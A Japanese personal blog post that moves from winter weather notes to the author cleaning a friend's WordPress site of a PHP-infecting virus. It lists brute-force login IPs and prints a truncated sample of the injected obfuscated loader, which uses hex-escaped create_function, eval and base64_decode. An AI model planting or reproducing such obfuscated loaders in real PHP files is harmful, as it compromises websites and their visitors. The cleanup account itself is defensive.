ウイルス感染


Highslide JS

いつまで続くこの寒さ!

寒い!
午前7時10分:気温-19.3℃、玄関前の雪温:-13℃
もう二週間以上真冬日が続いている。


Highslide JS

雪温:-13℃ 下層部はしまり雪でガチガチ


Highslide JS

庭先のニシキギ

庭の中央部に足跡! 獣?


Highslide JS

この足跡は!

知人のノートPC内のWordPressの挙動がおかしいと言うので(昨年からそのままにしていたらしい)昨日預かってきた。
なかを見てみると、昨年から世界中で蔓延したWordPressをターゲットにしたウイルスに感染している。


Highslide JS

ウイルス感染

WPの挙動がおかしくなり、大量のスパムメールが入るようになったと言っている。


Highslide JS

不正アタックによるログインエラー履歴

ログインエラー履歴を見ると膨大な数の履歴が残されている。
PCは恐ろしい頻度で不正アタックを試みられていて、ブロックしているとはいえ危険度大!!

ウイルスツールが、パスワードを1つ1つ手当たり次第に入力して不正アクセスを試みている!簡単なパスワードやIDなら数分もかからず解読されてしまだろう。
まさにいたちごっこで、セキュリティ問題ほど難しいものはない。

この間にも、

 
  IP Tried to log in as
  61.114.178.244 (1 lockout)
  27.94.27.180 (1 lockout)
  123.50.10.79 (1 lockout)
  122.1.33.70 (1 lockout)
  117.103.185.20 (1 lockout)
  133.204.222.44 (1 lockout)
  106.188.188.122 (1 lockout)
  49.97.93.223 (1 lockout)
  202.232.168.89 (1 lockout)
  114.179.127.141 (1 lockout)
  118.15.174.217 (1 lockout)
  114.159.218.74 (1 lockout)
  118.155.203.6 (1 lockout)
  221.254.55.14 (1 lockout)
  210.175.152.83 (1 lockout)
  210.191.215.5 (1 lockout)
        ・
        ・
        ・

アタックが続いている!
アタックしてきたIPアドレスで「国籍」、「プロバイダ」は分かるものの、相手を特定することはできない。
※ 各プロバイダも「個人情報保護法」その他で個人情報開示はしません(出来ません)。

そして「一切責任は持てないから!」と断りを入れてから、一先ずこのマルウエアの該当コード削除を始めたが!厄介なのは、このウイルスはPHPまるごと感染すること!

このウイルスは、WordPressに限らず、サーバー上全てのPHPファイルに、次のようなコードが埋め込まれる。

 
<?php $zend_framework=”\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e”; @error_reporting(0); $zend_framework(“”, “\x7d\73\x40\145\x76\141\x6c\50\x40\142\x61\163\x65\66\x34\137\x64\145\x6 ・・・ (省略) ・・・
 
DQogfSB9DQokZXZhMWZZMmJvNjF6bzgxNyA9ICJceDZmXDE0Mlx4NWZcMTYzXHg3N
FwxNDFceDcyXDE2NCI7ICRldmExZlkyYm82MXpvODE3KCJceDY1XDE2Nlx4NjFcNj
FceDY2XDEzMVx4MzJcMTQyXHg2MVwxNTNceDMxXDE0M1x4NTZcNjJceDY5XDE2MiI
pOw0KCX0\x4e\103\x6e\60\x3d\42\x29\51\x3b\57\x2f”); ?>

処置方法は、感染したPHPファイルの上記該当コードを削除するだけなのですが、サーバー上ほぼ全てのPHPファイルが感染しているので、削除作業は大変!

WordPressはPHPで書かれているので内部にある大量のPHPファイル(/wp-content/フォルダなど、フォルダもすべてチェック)を個別に確認する必要がある。
すべてチェックするのは大変な作業となるので、削除可能なものは、削除 → 再インストールで対処。
その他は、FTPソフトで焦らず1つずつ該当するコードを削除して行く。
※ 特にFreeのThemeはほぼ100%感染していた。
使用していないテーマをいくつもインストールしておかないで、削除した方が良い。

何時間かかったのか ・・・ ?
挙動は修正されたようだが、まだ見落としがないとも言えない。

ログイン及びFTPパスも変更し、とりあえず終わった旨を電話するとすぐにノートPCを取りに来た。彼はパソコンがないと日々身動きが取れなようだ。

彼のみならず、今や各家庭でも無くてはならないモノになりつつあるようだが、無くても生きて行ける。無くなったところで、しばらくの間は多少の不便を感じることがあっても直ぐに慣れるのが人間。
スマホや携帯電話すら持っていない人も周りにはまだまだ大勢いる。
誰もがパソコン・スマホ等保有が当たり前を前提とした社会のシステム造りが加速し、持たない人たちに対する気配り・優しさが消えつつある社会には寒気がする。

今やTVのみならず、あらゆる家電製品がネットで繋がれており、個人情報などは丸見えで常に覗かれている。便利なモノほど大きなリスクはつきもの!

 
「インターネットは人間が作ったが、人間には理解できない無秩序状態の最も壮大な実験だ。」
“The Internet is the first thing that humanity has built that humanity doesn’t understand, the largest experiment in anarchy that we have ever had.”
 - Eric Schmidt (エリック・シュミット / Google 社の元CEO) –

WordPressを使用されている方は、今一度ソース内のPHPファイルを再確認されては!
私もSNSなど、0と1の世界に振り回されないように最小限での活用を心がけている。

あ ~  肩がこった!

晴れ07:15 気温/-19℃ (.all images:biei.info)

コチラの記事も!

  • Wordpress 改ざん2011年12月14日 WordPress 改ざん 2011年12月13日(火)早朝から、Googleの検索結果 及び Firefox […]
  • FileZilla [フリーソフト vs 違法コピー]2009年11月20日 FileZilla [フリーソフト vs 違法コピー] 庭先 家の周りも日に日に白さが増して行きます。 年末になると「HPを作り替えるかな。」と毎年のように思うものの、年ごとに面倒になり、ここ数年はそのままで新年を迎えていますが、昨年に引き続き年内にサーバーの移転だけは行う予定でいます。 ところでホームページを […]
  • WPデータベース移行とアタック攻撃対策2013年4月10日 WPデータベース移行とアタック攻撃対策 冬の間は除雪に振り回されながらも慌ただしい時間が過ぎ去り、数十年ぶりの大雪に見舞われた厳しい冬もようやく出口が見えてきました。 先週より空き時間を利用して、またもWordPressのサーバー移転を行っていました。 実はWordPressはいろいろな攻撃対象になり易いので […]
  • サーバー移転2008年1月29日 サーバー移転 五年ぶりにサーバーの移転を行います。 この機会にこれまで使用していたMovable Typeから少し離れ、Wordpress と Nucleus […]
  • ICC Profile2009年9月8日 ICC Profile 当サイトの閲覧には【 Firefox 】【 Safari 】 を推奨します。 と、 Topページに記載しているため、Microsoft 社のWebブラウザ「Internet Explorer (以下 IE に略)」ではだめなのですか? […]
  •  Windows7 Service Pack 12011年2月24日 Windows7 Service Pack 1 いつも通り朝の段取りを済ませ、パソコンを on にするとアップデートの案内が。 昨日23日より一般公開された Windows7 Service Pack 1(SP1) の知らせです。 Windows7 Service Pack […]
  • サーバー移転作業2009年11月25日 サーバー移転作業 昨年に続きサーバー移転を行っています。 Webサイト・Blog(WordPress)など、しばらくの間は表示が乱れることがあります。 【WordPress サーバー移転作業】 1. 旧サーバのphpMyAdminからDBをエクスポート。 2. […]